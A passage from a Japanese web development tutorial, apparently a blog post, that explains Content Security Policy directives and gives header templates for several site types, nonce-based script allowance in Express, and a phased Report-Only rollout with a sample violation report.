alt=\"\" class=\"c-balloon__iconImg\" width=\"80px\" height=\"80px\"><span class=\"c-balloon__iconName\">\u751f\u5f92<\/span><\/div><div class=\"c-balloon__body -speaking -border-none\"><div class=\"c-balloon__text\">\n<p><strong>\u8272\u3005\u306a\u30c7\u30a3\u30ec\u30af\u30c6\u30a3\u30d6\u304c\u3042\u308b\u3093\u3067\u3059\u306d\uff01\u52c9\u5f37\u306b\u306a\u308a\u307e\u3059\uff01<\/strong><\/p>\n<span class=\"c-balloon__shapes\"><span class=\"c-balloon__before\"><\/span><span class=\"c-balloon__after\"><\/span><\/span><\/div><\/div><\/div><\/div>\n\n\n<h3 class=\"wp-block-heading\">\u4e3b\u8981\u306a\u30c7\u30a3\u30ec\u30af\u30c6\u30a3\u30d6\u4e00\u89a7<\/h3>\n\n\n\n<figure 
class=\"wp-block-table\"><table><thead><tr><th>\u30c7\u30a3\u30ec\u30af\u30c6\u30a3\u30d6<\/th><th>\u5236\u5fa1\u5bfe\u8c61<\/th><th>\u8aac\u660e<\/th><\/tr><\/thead><tbody><tr><td><strong>default-src<\/strong><\/td><td>\u3059\u3079\u3066\u306e\u30ea\u30bd\u30fc\u30b9<\/td><td>\u4ed6\u306e\u30c7\u30a3\u30ec\u30af\u30c6\u30a3\u30d6\u306e\u30c7\u30d5\u30a9\u30eb\u30c8\u5024<\/td><\/tr><tr><td><strong>script-src<\/strong><\/td><td>JavaScript<\/td><td>\u30b9\u30af\u30ea\u30d7\u30c8\u306e\u8aad\u307f\u8fbc\u307f\u5143\u3092\u5236\u9650<\/td><\/tr><tr><td><strong>style-src<\/strong><\/td><td>CSS<\/td><td>\u30b9\u30bf\u30a4\u30eb\u30b7\u30fc\u30c8\u306e\u8aad\u307f\u8fbc\u307f\u5143\u3092\u5236\u9650<\/td><\/tr><tr><td><strong>img-src<\/strong><\/td><td>\u753b\u50cf<\/td><td>\u753b\u50cf\u306e\u8aad\u307f\u8fbc\u307f\u5143\u3092\u5236\u9650<\/td><\/tr><tr><td><strong>font-src<\/strong><\/td><td>\u30d5\u30a9\u30f3\u30c8<\/td><td>Web\u30d5\u30a9\u30f3\u30c8\u306e\u8aad\u307f\u8fbc\u307f\u5143\u3092\u5236\u9650<\/td><\/tr><tr><td><strong>connect-src<\/strong><\/td><td>\u901a\u4fe1<\/td><td>fetch\u3001XHR\u3001WebSocket\u306e\u63a5\u7d9a\u5148\u3092\u5236\u9650<\/td><\/tr><tr><td><strong>media-src<\/strong><\/td><td>\u30e1\u30c7\u30a3\u30a2<\/td><td>\u97f3\u58f0\u30fb\u52d5\u753b\u306e\u8aad\u307f\u8fbc\u307f\u5143\u3092\u5236\u9650<\/td><\/tr><tr><td><strong>object-src<\/strong><\/td><td>\u30d7\u30e9\u30b0\u30a4\u30f3<\/td><td>&lt;object&gt;\u3001&lt;embed&gt;\u306e\u8aad\u307f\u8fbc\u307f\u5143\u3092\u5236\u9650<\/td><\/tr><tr><td><strong>frame-src<\/strong><\/td><td>iframe<\/td><td>iframe\u3067\u8aad\u307f\u8fbc\u3080\u30da\u30fc\u30b8\u3092\u5236\u9650<\/td><\/tr><tr><td><strong>base-uri<\/strong><\/td><td>&lt;base&gt;\u30bf\u30b0<\/td><td>&lt;base&gt;\u8981\u7d20\u306eURL\u3092\u5236\u9650<\/td><\/tr><tr><td><strong>form-action<\/strong><\/td><td>\u30d5\u30a9\u30fc\u30e0\u9001\u4fe1<\/td><td>\u30d5\u30a9\u30fc\u30e0\u306e\u9001\u4fe1\u5148\u3092\u5236\u9650<\/td><\/tr><\/
tbody><\/table><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">\u30bd\u30fc\u30b9\u5024\u306e\u6307\u5b9a\u65b9\u6cd5<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u5404\u30c7\u30a3\u30ec\u30af\u30c6\u30a3\u30d6\u306b\u306f\u3001\u8a31\u53ef\u3059\u308b\u53d6\u5f97\u5143\uff08\u30bd\u30fc\u30b9\uff09\u3092\u6307\u5b9a\u3057\u307e\u3059\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>\u30bd\u30fc\u30b9\u5024<\/th><th>\u610f\u5473<\/th><th>\u4f8b<\/th><\/tr><\/thead><tbody><tr><td><strong>&#39;self&#39;<\/strong><\/td><td>\u81ea\u30b5\u30a4\u30c8\uff08\u540c\u4e00\u30aa\u30ea\u30b8\u30f3\uff09<\/td><td>https:\/\/example.com<\/td><\/tr><tr><td><strong>&#39;none&#39;<\/strong><\/td><td>\u3059\u3079\u3066\u62d2\u5426<\/td><td>&#8211;<\/td><\/tr><tr><td><strong>&#39;unsafe-inline&#39;<\/strong><\/td><td>\u30a4\u30f3\u30e9\u30a4\u30f3\u30b3\u30fc\u30c9\u3092\u8a31\u53ef<\/td><td>&lt;script&gt;&#8230;&lt;\/script&gt;<\/td><\/tr><tr><td><strong>&#39;unsafe-eval&#39;<\/strong><\/td><td>eval()\u3092\u8a31\u53ef<\/td><td>eval(&#39;code&#39;)<\/td><\/tr><tr><td><strong>\u30c9\u30e1\u30a4\u30f3<\/strong><\/td><td>\u7279\u5b9a\u30c9\u30e1\u30a4\u30f3\u3092\u8a31\u53ef<\/td><td>https:\/\/cdn.example.com<\/td><\/tr><tr><td><strong>\u30ef\u30a4\u30eb\u30c9\u30ab\u30fc\u30c9<\/strong><\/td><td>\u30b5\u30d6\u30c9\u30e1\u30a4\u30f3\u5168\u4f53\u3092\u8a31\u53ef<\/td><td>https:\/\/*.example.com<\/td><\/tr><tr><td><strong>\u30b9\u30ad\u30fc\u30e0<\/strong><\/td><td>\u7279\u5b9a\u306e\u30d7\u30ed\u30c8\u30b3\u30eb\u3092\u8a31\u53ef<\/td><td>https:\u3001data:<\/td><\/tr><tr><td><strong>nonce-<\/strong><\/td><td>\u7279\u5b9a\u306e\u30b9\u30af\u30ea\u30d7\u30c8\/\u30b9\u30bf\u30a4\u30eb\u3092\u8a31\u53ef\uff08\u30ea\u30af\u30a8\u30b9\u30c8\u3054\u3068\u306b\u751f\u6210\u3059\u308b\u63a8\u6e2c\u4e0d\u80fd\u306a\u5024\uff09<\/td><td>&#39;nonce-abc123&#39;<\/td><\/tr><tr><td><strong>hash-<\/strong><\/td><td>\u30cf\u30c3\u30b7\u30e5\u5024\u304c\u4e00\u81f4\u3059\u308b\u30b3\u30fc\u30c9\u3092\u8a31\u53ef<\/td><td>&#39;sha256-abc&#8230;&#39;<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h
3 class=\"wp-block-heading\">\u30c7\u30a3\u30ec\u30af\u30c6\u30a3\u30d6\u306e\u8a18\u8ff0\u4f8b<\/h3>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-plain\"><code>Content-Security-Policy:\n  default-src &#39;self&#39;;\n  script-src &#39;self&#39; https:\/\/cdn.example.com;\n  style-src &#39;self&#39; &#39;unsafe-inline&#39;;\n  img-src &#39;self&#39; data: https:;\n  font-src &#39;self&#39; https:\/\/fonts.gstatic.com;\n  connect-src &#39;self&#39; https:\/\/api.example.com;\n  frame-src &#39;none&#39;;\n  object-src &#39;none&#39;;\n  base-uri &#39;self&#39;;\n  form-action &#39;self&#39;;<\/code><\/pre><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u3053\u306e\u8a2d\u5b9a\u306e\u610f\u5473\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>default-src &#8216;self&#8217;<\/strong>: \u30c7\u30d5\u30a9\u30eb\u30c8\u306f\u81ea\u30b5\u30a4\u30c8\u306e\u307f\u8a31\u53ef<\/li>\n\n\n\n<li><strong>script-src<\/strong>: \u81ea\u30b5\u30a4\u30c8\u3068cdn.example.com\u306eJavaScript\u306e\u307f<\/li>\n\n\n\n<li><strong>style-src<\/strong>: \u81ea\u30b5\u30a4\u30c8\u306eCSS\u3068\u30a4\u30f3\u30e9\u30a4\u30f3\u30b9\u30bf\u30a4\u30eb<\/li>\n\n\n\n<li><strong>img-src<\/strong>: \u81ea\u30b5\u30a4\u30c8\u3001data:\u30b9\u30ad\u30fc\u30e0\u3001\u3059\u3079\u3066\u306eHTTPS\u30b5\u30a4\u30c8\u306e\u753b\u50cf<\/li>\n\n\n\n<li><strong>font-src<\/strong>: \u81ea\u30b5\u30a4\u30c8\u3068Google Fonts<\/li>\n\n\n\n<li><strong>connect-src<\/strong>: \u81ea\u30b5\u30a4\u30c8\u3068api.example.com\u3078\u306eAJAX\u901a\u4fe1<\/li>\n\n\n\n<li><strong>frame-src &#8216;none&#8217;<\/strong>: \u3059\u3079\u3066\u306eiframe\u8aad\u307f\u8fbc\u307f\u3092\u7981\u6b62<\/li>\n\n\n\n<li><strong>object-src &#8216;none&#8217;<\/strong>: Flash\u7b49\u306e\u30d7\u30e9\u30b0\u30a4\u30f3\u3092\u7981\u6b62<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 
class=\"wp-block-heading\">\u5b9f\u8df5\u7684\u306aCSP\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u96c6<\/h2>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-full\"><img decoding=\"async\" width=\"1536\" height=\"864\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006666-1.jpg\" alt=\"\" class=\"wp-image-13260\" srcset=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006666-1.jpg 1536w, https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006666-1-768x432.jpg 768w\" sizes=\"(max-width: 1536px) 100vw, 1536px\" \/><\/figure>\n<\/div>\n\n<div class=\"swell-block-balloon\"><div class=\"c-balloon -bln-left\" data-col=\"gray\"><div class=\"c-balloon__icon -square\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2025\/06\/\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8-2025-06-15-14.48.08.jpg\" alt=\"\" class=\"c-balloon__iconImg\" width=\"80px\" height=\"80px\"><span class=\"c-balloon__iconName\">\u751f\u5f92<\/span><\/div><div class=\"c-balloon__body -speaking -border-none\"><div class=\"c-balloon__text\">\n<p><strong>CSP\u306e\u5b9f\u8df5\u7684\u306a\u65b9\u6cd5\u3092\u77e5\u308a\u305f\u3044\u3067\u3059\uff01<\/strong><\/p>\n<span class=\"c-balloon__shapes\"><span class=\"c-balloon__before\"><\/span><span class=\"c-balloon__after\"><\/span><\/span><\/div><\/div><\/div><\/div>\n\n<div class=\"swell-block-balloon\"><div class=\"c-balloon -bln-right\" data-col=\"gray\"><div class=\"c-balloon__icon -square\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2025\/06\/\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8-2025-06-15-15.11.23.jpg\" alt=\"\" class=\"c-balloon__iconImg\" width=\"80px\" height=\"80px\"><span class=\"c-balloon__iconName\">\u30da\u30f3\u535a\u58eb<\/span><\/div><div class=\"c-balloon__body -speaking -border-none\"><div 
class=\"c-balloon__text\">\n<p><strong>\u826f\u3044\u5fc3\u304c\u3051\u3058\u3083\uff01\u3053\u3053\u3067\u306f\u3001\u7528\u9014\u5225\u306e\u5b9f\u8df5\u7684\u306aCSP\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u3092\u7d39\u4ecb\u3059\u308b\u305e\u3002\u30d7\u30ed\u30b8\u30a7\u30af\u30c8\u306b\u5fdc\u3058\u3066\u9078\u629e\u30fb\u30ab\u30b9\u30bf\u30de\u30a4\u30ba\u3059\u308b\u306e\u3058\u3083\uff01<\/strong><\/p>\n<span class=\"c-balloon__shapes\"><span class=\"c-balloon__before\"><\/span><span class=\"c-balloon__after\"><\/span><\/span><\/div><\/div><\/div><\/div>\n\n\n<h3 class=\"wp-block-heading\">\u30c6\u30f3\u30d7\u30ec\u30fc\u30c81: \u6700\u3082\u53b3\u683c\u306aCSP\uff08\u9759\u7684\u30b5\u30a4\u30c8\u5411\u3051\uff09<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u5916\u90e8\u30ea\u30bd\u30fc\u30b9\u3092\u4e00\u5207\u4f7f\u7528\u3057\u306a\u3044\u3001\u5b8c\u5168\u306b\u9759\u7684\u306aWeb\u30b5\u30a4\u30c8\u5411\u3051\uff1a<\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-plain\"><code>Content-Security-Policy:\n  default-src &#39;none&#39;;\n  script-src &#39;self&#39;;\n  style-src &#39;self&#39;;\n  img-src &#39;self&#39;;\n  font-src &#39;self&#39;;\n  connect-src &#39;none&#39;;\n  frame-src &#39;none&#39;;\n  object-src &#39;none&#39;;\n  base-uri &#39;self&#39;;\n  form-action &#39;self&#39;;<\/code><\/pre><\/div>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u7279\u5fb4\uff1a<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u6700\u3082\u5b89\u5168\u306a\u8a2d\u5b9a<\/li>\n\n\n\n<li>\u30a4\u30f3\u30e9\u30a4\u30f3\u30b9\u30af\u30ea\u30d7\u30c8\/\u30b9\u30bf\u30a4\u30eb\u306f\u4f7f\u7528\u4e0d\u53ef<\/li>\n\n\n\n<li>\u5916\u90e8\u30ea\u30bd\u30fc\u30b9\uff08CDN\u3001API\uff09\u306f\u4f7f\u7528\u4e0d\u53ef<\/li>\n\n\n\n<li>\u30d6\u30ed\u30b0\u3084\u30b3\u30fc\u30dd\u30ec\u30fc\u30c8\u30b5\u30a4\u30c8\u306b\u6700\u9069<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">\u30c6\u30f3\u30d7\u30ec\u30fc\u30c82: 
CDN\u3092\u4f7f\u7528\u3059\u308b\u4e00\u822c\u7684\u306aWeb\u30b5\u30a4\u30c8<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Google Fonts\u3001CDN\u304b\u3089\u306eJavaScript\u30e9\u30a4\u30d6\u30e9\u30ea\u3092\u4f7f\u7528\u3059\u308b\u5834\u5408\uff1a<\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-plain\"><code>Content-Security-Policy:\n  default-src &#39;self&#39;;\n  script-src &#39;self&#39; https:\/\/cdn.jsdelivr.net https:\/\/cdnjs.cloudflare.com;\n  style-src &#39;self&#39; https:\/\/fonts.googleapis.com;\n  img-src &#39;self&#39; data: https:;\n  font-src &#39;self&#39; https:\/\/fonts.gstatic.com;\n  connect-src &#39;self&#39;;\n  frame-src &#39;none&#39;;\n  object-src &#39;none&#39;;\n  base-uri &#39;self&#39;;\n  form-action &#39;self&#39;;\n  upgrade-insecure-requests;<\/code><\/pre><\/div>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u7279\u5fb4\uff1a<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u4e3b\u8981CDN\u304b\u3089\u306e\u30e9\u30a4\u30d6\u30e9\u30ea\u8aad\u307f\u8fbc\u307f\u3092\u8a31\u53ef<\/li>\n\n\n\n<li>Google Fonts\u3092\u4f7f\u7528\u53ef\u80fd<\/li>\n\n\n\n<li>HTTPS\u306e\u753b\u50cf\u3092\u5168\u8a31\u53ef<\/li>\n\n\n\n<li>upgrade-insecure-requests\u3067HTTP\u3092\u81ea\u52d5\u7684\u306bHTTPS\u306b<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">\u30c6\u30f3\u30d7\u30ec\u30fc\u30c83: Google Analytics\u3084Google Tag Manager\u3092\u4f7f\u7528<\/h3>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-plain\"><code>Content-Security-Policy:\n  default-src &#39;self&#39;;\n  script-src &#39;self&#39; https:\/\/www.googletagmanager.com https:\/\/www.google-analytics.com;\n  style-src &#39;self&#39; &#39;unsafe-inline&#39;;\n  img-src &#39;self&#39; data: https:\/\/www.google-analytics.com https:\/\/www.googletagmanager.com;\n  font-src &#39;self&#39;;\n  connect-src &#39;self&#39; https:\/\/www.google-analytics.com https:\/\/analytics.google.com;\n  frame-src &#39;none&#39;;\n  
object-src &#39;none&#39;;\n  base-uri &#39;self&#39;;\n  form-action &#39;self&#39;;<\/code><\/pre><\/div>\n\n\n\n<p class=\"is-style-big_icon_caution wp-block-paragraph\"><strong>\u6ce8\u610f\u70b9\uff1a<\/strong><br><strong>\u30fb<\/strong>Google Tag Manager\u306f\u52d5\u7684\u306b\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u8aad\u307f\u8fbc\u3080\u305f\u3081\u3001&#8217;unsafe-eval&#8217;\u304c\u5fc5\u8981\u306a\u5834\u5408\u304c\u3042\u308b<strong><br>\u30fb<\/strong>\u3088\u308a\u53b3\u683c\u306b\u3059\u308b\u306b\u306f\u3001nonce\u3092\u4f7f\u7528\u3057\u3066\u30a4\u30f3\u30e9\u30a4\u30f3\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u500b\u5225\u8a31\u53ef<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u30c6\u30f3\u30d7\u30ec\u30fc\u30c84: React\/Vue\u306a\u3069\u306e\u30e2\u30c0\u30f3\u30d5\u30ec\u30fc\u30e0\u30ef\u30fc\u30af<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">SPA\u30d5\u30ec\u30fc\u30e0\u30ef\u30fc\u30af\u3092\u4f7f\u7528\u3059\u308b\u5834\u5408\uff1a<\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-plain\"><code>Content-Security-Policy:\n  default-src &#39;self&#39;;\n  script-src &#39;self&#39;;\n  style-src &#39;self&#39; &#39;unsafe-inline&#39;;\n  img-src &#39;self&#39; data: blob: https:;\n  font-src &#39;self&#39; data:;\n  connect-src &#39;self&#39; https:\/\/api.example.com;\n  frame-src &#39;none&#39;;\n  object-src &#39;none&#39;;\n  base-uri &#39;self&#39;;\n  form-action &#39;self&#39;;\n  worker-src &#39;self&#39; blob:;<\/code><\/pre><\/div>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u7279\u5fb4\uff1a<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>style-src\u306b&#8217;unsafe-inline&#8217;\uff08CSS-in-JS\u3067\u5fc5\u8981\uff09<\/li>\n\n\n\n<li>img-src\u306bblob:\uff08\u52d5\u7684\u753b\u50cf\u751f\u6210\u3067\u5fc5\u8981\uff09<\/li>\n\n\n\n<li>worker-src\u306bblob:\uff08Web Worker\u3067\u5fc5\u8981\uff09<\/li>\n\n\n\n<li>connect-src\u306bAPI\u901a\u4fe1\u5148\u3092\u6307\u5b9a<\/li>\n<\/ul>\n\n\n\n<h3 
class=\"wp-block-heading\">\u30c6\u30f3\u30d7\u30ec\u30fc\u30c85: nonce\u3092\u4f7f\u7528\u3057\u305f\u6700\u9ad8\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u30ec\u30d9\u30eb<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u30a4\u30f3\u30e9\u30a4\u30f3\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u4f7f\u7528\u3057\u3064\u3064\u3001\u6700\u9ad8\u30ec\u30d9\u30eb\u306e\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u3092\u5b9f\u73fe\uff1a<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u30b5\u30fc\u30d0\u30fc\u5074\uff08Node.js\/Express\uff09\uff1a<\/strong><\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-js\" data-lang=\"JavaScript\"><code>const crypto = require(&#39;crypto&#39;);\n\napp.use((req, res, next) =&gt; {\n  \/\/ \u30ea\u30af\u30a8\u30b9\u30c8\u3054\u3068\u306b\u30e9\u30f3\u30c0\u30e0\u306anonce\u3092\u751f\u6210\n  const nonce = crypto.randomBytes(16).toString(&#39;base64&#39;);\n  res.locals.nonce = nonce;\n\n  res.setHeader(\n    &#39;Content-Security-Policy&#39;,\n    `default-src &#39;self&#39;; script-src &#39;self&#39; &#39;nonce-${nonce}&#39;; style-src &#39;self&#39; &#39;nonce-${nonce}&#39;; object-src &#39;none&#39;;`\n  );\n  next();\n});<\/code><\/pre><\/div>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>HTML\uff1a<\/strong><\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-html\" data-lang=\"HTML\"><code>&lt;!-- nonce\u3092\u6307\u5b9a\u3057\u3066\u30a4\u30f3\u30e9\u30a4\u30f3\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u8a31\u53ef --&gt;\n&lt;script nonce=&quot;&lt;%= nonce %&gt;&quot;&gt;\n  console.log(&#39;\u3053\u306e\u30b9\u30af\u30ea\u30d7\u30c8\u306f\u5b9f\u884c\u3055\u308c\u307e\u3059&#39;);\n&lt;\/script&gt;\n\n&lt;!-- nonce\u304c\u306a\u3044\u30b9\u30af\u30ea\u30d7\u30c8\u306f\u30d6\u30ed\u30c3\u30af\u3055\u308c\u308b --&gt;\n&lt;script&gt;\n  console.log(&#39;\u3053\u306e\u30b9\u30af\u30ea\u30d7\u30c8\u306f\u30d6\u30ed\u30c3\u30af\u3055\u308c\u307e\u3059&#39;);\n&lt;\/script&gt;<\/code><\/pre><\/div>\n\n\n\n<p 
class=\"wp-block-paragraph\"><strong>nonce\u306e\u5229\u70b9\uff1a<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>&#8216;unsafe-inline&#8217;\u3092\u4f7f\u308f\u305a\u306b\u30a4\u30f3\u30e9\u30a4\u30f3\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u8a31\u53ef<\/li>\n\n\n\n<li>\u653b\u6483\u8005\u306fnonce\u3092\u4e88\u6e2c\u3067\u304d\u306a\u3044\u305f\u3081\u3001XSS\u653b\u6483\u3092\u9632\u3052\u308b<\/li>\n\n\n\n<li>\u30ea\u30af\u30a8\u30b9\u30c8\u3054\u3068\u306b\u7570\u306a\u308bnonce\u3092\u751f\u6210\u3059\u308b\u3053\u3068\u304c\u91cd\u8981<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">CSP\u306e\u6bb5\u968e\u7684\u306a\u5c0e\u5165\u65b9\u6cd5<\/h2>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-full\"><img decoding=\"async\" width=\"1536\" height=\"1024\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006668.jpg\" alt=\"\" class=\"wp-image-13262\" srcset=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006668.jpg 1536w, https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006668-768x512.jpg 768w\" sizes=\"(max-width: 1536px) 100vw, 1536px\" \/><\/figure>\n<\/div>\n\n<div class=\"swell-block-balloon\"><div class=\"c-balloon -bln-left\" data-col=\"gray\"><div class=\"c-balloon__icon -square\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2025\/06\/\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8-2025-06-15-15.00.55.jpg\" alt=\"\" class=\"c-balloon__iconImg\" width=\"80px\" height=\"80px\"><span class=\"c-balloon__iconName\">\u751f\u5f92<\/span><\/div><div class=\"c-balloon__body -speaking -border-none\"><div 
class=\"c-balloon__text\">\n<p><strong>CSP\u306e\u8a2d\u5b9a\u3001\u3044\u308d\u3044\u308d\u306a\u7a2e\u985e\u304c\u3042\u3063\u3066\u8907\u96d1\u3067\u3059\u306d&#8230;\u5b9f\u969b\u306b\u3069\u3053\u304b\u3089\u59cb\u3081\u308c\u3070\u826f\u3044\u3067\u3057\u3087\u3046\u304b\uff1f<\/strong><\/p>\n<span class=\"c-balloon__shapes\"><span class=\"c-balloon__before\"><\/span><span class=\"c-balloon__after\"><\/span><\/span><\/div><\/div><\/div><\/div>\n\n<div class=\"swell-block-balloon\"><div class=\"c-balloon -bln-right\" data-col=\"gray\"><div class=\"c-balloon__icon -square\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2025\/06\/\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8-2025-06-15-15.12.07.jpg\" alt=\"\" class=\"c-balloon__iconImg\" width=\"80px\" height=\"80px\"><span class=\"c-balloon__iconName\">\u30da\u30f3\u535a\u58eb<\/span><\/div><div class=\"c-balloon__body -speaking -border-none\"><div class=\"c-balloon__text\">\n<p><strong>\u307e\u305a\u306fReport-Only\u30e2\u30fc\u30c9\u3067\u69d8\u5b50\u3092\u898b\u308b\u306e\u304c\u304a\u3059\u3059\u3081\u3058\u3083\uff01\u3044\u304d\u306a\u308a\u53b3\u683c\u306a\u8a2d\u5b9a\u306b\u3059\u308b\u3068\u3001\u30b5\u30a4\u30c8\u304c\u52d5\u304b\u306a\u304f\u306a\u308b\u53ef\u80fd\u6027\u304c\u3042\u308b\u304b\u3089\u306e\u3046\u3002\u6bb5\u968e\u7684\u306b\u9032\u3081\u308b\u3053\u3068\u304c\u6210\u529f\u306e\u79d8\u8a23\u3058\u3083\u305e\uff01<\/strong><\/p>\n<span class=\"c-balloon__shapes\"><span class=\"c-balloon__before\"><\/span><span class=\"c-balloon__after\"><\/span><\/span><\/div><\/div><\/div><\/div>\n\n\n<h3 class=\"wp-block-heading\">\u30d5\u30a7\u30fc\u30ba1: Report-Only\u30e2\u30fc\u30c9\u3067\u5f71\u97ff\u3092\u8abf\u67fb<\/h3>\n\n\n\n<p 
class=\"wp-block-paragraph\">Content-Security-Policy-Report-Only\u30d8\u30c3\u30c0\u30fc\u3092\u4f7f\u7528\u3059\u308b\u3068\u3001\u30dd\u30ea\u30b7\u30fc\u9055\u53cd\u3092\u30d6\u30ed\u30c3\u30af\u305b\u305a\u3001\u30ec\u30dd\u30fc\u30c8\u306e\u307f\u9001\u4fe1\u3057\u307e\u3059\u3002<\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-plain\"><code>Content-Security-Policy-Report-Only:\n  default-src &#39;self&#39;;\n  script-src &#39;self&#39;;\n  report-uri https:\/\/example.com\/csp-report;<\/code><\/pre><\/div>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u30ec\u30dd\u30fc\u30c8\u30a8\u30f3\u30c9\u30dd\u30a4\u30f3\u30c8\u306e\u5b9f\u88c5\uff08Node.js\/Express\uff09\uff1a<\/strong><\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-js\" data-lang=\"JavaScript\"><code>app.post(&#39;\/csp-report&#39;, express.json({ type: &#39;application\/csp-report&#39; }), (req, res) =&gt; {\n  console.log(&#39;CSP Violation:&#39;, JSON.stringify(req.body, null, 2));\n\n  \/\/ \u30ec\u30dd\u30fc\u30c8\u3092\u30ed\u30b0\u30d5\u30a1\u30a4\u30eb\u3084\u30c7\u30fc\u30bf\u30d9\u30fc\u30b9\u306b\u4fdd\u5b58\n  \/\/ \u307e\u305f\u306f\u5916\u90e8\u30b5\u30fc\u30d3\u30b9\uff08Sentry\u3001Report URI\u306a\u3069\uff09\u306b\u9001\u4fe1\n\n  res.status(204).end();\n});<\/code><\/pre><\/div>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u30ec\u30dd\u30fc\u30c8\u306e\u5185\u5bb9\u4f8b\uff1a<\/strong><\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-json\" data-lang=\"JSON\"><code>{\n  &quot;csp-report&quot;: {\n    &quot;document-uri&quot;: &quot;https:\/\/example.com\/page&quot;,\n    &quot;violated-directive&quot;: &quot;script-src &#39;self&#39;&quot;,\n    &quot;blocked-uri&quot;: &quot;https:\/\/evil.com\/malicious.js&quot;,\n    &quot;line-number&quot;: 42,\n    &quot;column-number&quot;: 5,\n    &quot;source-file&quot;: &quot;https:\/\/example.com\/page&quot;\n  }\n}<\/code><\/pre><\/div>\n\n\n\n<p 
class=\"wp-block-paragraph\"><strong>\u30d5\u30a7\u30fc\u30ba1\u306e\u624b\u9806\uff1a<\/strong><\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Report-Only\u30e2\u30fc\u30c9\u3067\u53b3\u683c\u306a\u30dd\u30ea\u30b7\u30fc\u3092\u8a2d\u5b9a<\/li>\n\n\n\n<li>1-2\u9031\u9593\u904b\u7528\u3057\u3066\u30ec\u30dd\u30fc\u30c8\u3092\u53ce\u96c6<\/li>\n\n\n\n<li>\u9055\u53cd\u5185\u5bb9\u3092\u5206\u6790\u3057\u3001\u6b63\u5f53\u306a\u30ea\u30bd\u30fc\u30b9\u3092\u7279\u5b9a<\/li>\n\n\n\n<li>\u30dd\u30ea\u30b7\u30fc\u3092\u8abf\u6574\u3057\u3066\u518d\u30c6\u30b9\u30c8<\/li>\n<\/ol>\n\n\n\n<h3 class=\"wp-block-heading\">\u30d5\u30a7\u30fc\u30ba2: \u7de9\u3044\u30dd\u30ea\u30b7\u30fc\u3067\u672c\u756a\u9069\u7528<\/h3>\n\n\n\n<p 